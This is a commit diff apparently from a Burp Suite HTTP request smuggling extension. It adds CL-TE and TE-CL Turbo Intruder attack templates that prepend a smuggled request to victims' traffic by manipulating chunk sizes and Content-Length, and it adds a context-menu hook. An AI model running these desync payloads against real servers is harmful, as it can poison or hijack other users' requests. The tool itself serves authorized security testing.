Migrate stuff from turbo intruder to make the tool fully standalone

build.gradle

@@ -9,7 +9,6 @@ dependencies {
     compile 'org.apache.commons:commons-lang3:3.5'
     compile group: 'org.apache.commons', name: 'commons-collections4', version: '4.1'
     compile group: 'org.xerial', name: 'sqlite-jdbc', version: '3.25.2'
-    // compile files('/Users/james/Dropbox/turboIntruder/out/artifacts/req_jar/req.jar')
     compile files('/Users/james/Dropbox/turboIntruder/src/build/libs/turbo-intruder-all.jar')
 }
 

resources/CL-TE.py

@@ -0,0 +1,28 @@
+def queueRequests(target, wordlists):
+    engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=5,
+                           requestsPerConnection=1,
+                           resumeSSL=False,
+                           timeout=10,
+                           pipeline=False,
+                           maxRetriesPerRequest=0
+                           )
+    engine.start()
+
+    # This will prefix the victim's request. Edit it to achieve the desired effect.
+    prefix = '''GET /hopefully404 HTTP/1.1
+X-Ignore: X'''
+
+    # The request engine will auto-fix the content-length for us
+    attack = target.req + prefix
+    engine.queue(attack)
+
+    victim = target.req
+    for i in range(14):
+        engine.queue(victim)
+        time.sleep(0.05)
+
+
+def handleResponse(req, interesting):
+    table.add(req)
+

resources/TE-CL.py

@@ -0,0 +1,34 @@
+import re
+
+def queueRequests(target, wordlists):
+    engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=5,
+                           requestsPerConnection=1,
+                           resumeSSL=False,
+                           timeout=10,
+                           pipeline=False,
+                           maxRetriesPerRequest=0
+                           )
+    engine.start()
+
+    # This will prefix the victim's request. Edit it to achieve the desired effect.
+    prefix = '''POST /hopefully404 HTTP/1.1
+Host: 0uv5p05xabvwcz8ukuc73ikco3uuij.psres.net
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+
+x=1'''
+
+    chunk_size = hex(len(prefix)).lstrip("0x")
+    attack = target.req.replace('0\r\n\r\n', chunk_size+'\r\n'+prefix+'\r\n0\r\n\r\n')
+    content_length = re.search('Content-Length: ([\d]+)', attack).group(1)
+    attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-3))
+    engine.queue(attack)
+
+    for i in range(14):
+        engine.queue(target.req)
+        time.sleep(0.05)
+
+
+def handleResponse(req, interesting):
+    table.add(req)

src/burp/BurpExtender.java

@@ -20,6 +20,7 @@ public void registerExtenderCallbacks(final IBurpExtenderCallbacks callbacks) {
 
         //new BulkScanLauncher(new DualContentScan("CL-CL"));
 
+        callbacks.registerContextMenuFactory(new SuggestAttack());
         Utils.setBurpPresent(callbacks);
         //ZgrabLoader x = new ZgrabLoader(scanner);
         //x.launchSmugglePipeline();

src/burp/SmuggleMenu.java

@@ -21,26 +21,30 @@ public List<JMenuItem> createMenuItems(IContextMenuInvocation invocation) {
             return options;
         }
 
-        JMenuItem probeButton = new JMenuItem("Convert to chunked");
-        probeButton.addActionListener(new ActionListener() {
-            @Override
-            public void actionPerformed(ActionEvent e) {
-                // need a handle on an IMessageEditorTab
-                reqs[0].setRequest(SmuggleScanBox.makeChunked(reqs[0].getRequest(), 0, 0));
-            }
-        });
-
-        options.add(probeButton);
-
-        JMenuItem gzipButton = new JMenuItem("GZIP encode body");
-        gzipButton.addActionListener(new ActionListener() {
-            @Override
-            public void actionPerformed(ActionEvent e) {
-                // need a handle on an IMessageEditorTab
-                reqs[0].setRequest(SmuggleScanBox.gzipBody(reqs[0].getRequest()));
-            }
-        });
-        options.add(gzipButton);
+        byte[] req = reqs[0].getRequest();
+
+        if ( Utilities.getBodyStart(req) < req.length) {
+            JMenuItem probeButton = new JMenuItem("Convert to chunked");
+            probeButton.addActionListener(new ActionListener() {
+                @Override
+                public void actionPerformed(ActionEvent e) {
+                    // need a handle on an IMessageEditorTab
+                    reqs[0].setRequest(SmuggleScanBox.makeChunked(reqs[0].getRequest(), 0, 0));
+                }
+            });
+
+            options.add(probeButton);
+
+            JMenuItem gzipButton = new JMenuItem("GZIP encode body");
+            gzipButton.addActionListener(new ActionListener() {
+                @Override
+                public void actionPerformed(ActionEvent e) {
+                    // need a handle on an IMessageEditorTab
+                    reqs[0].setRequest(SmuggleScanBox.gzipBody(reqs[0].getRequest()));
+                }
+            });
+            options.add(gzipButton);
+        }
 
         return options;
     }

src/burp/Utilities.java

@@ -509,6 +509,10 @@ static String toCanary(String payload) {
         return "wrtqva" + mangle(payload);
     }
 
+    static String getResource(String name) {
+        return new Scanner(Utilities.class.getResourceAsStream(name), "UTF-8").useDelimiter("\\A").next();
+    }
+
     public static int getBodyStart(byte[] response) {
         int i = 0;
         int newlines_seen = 0;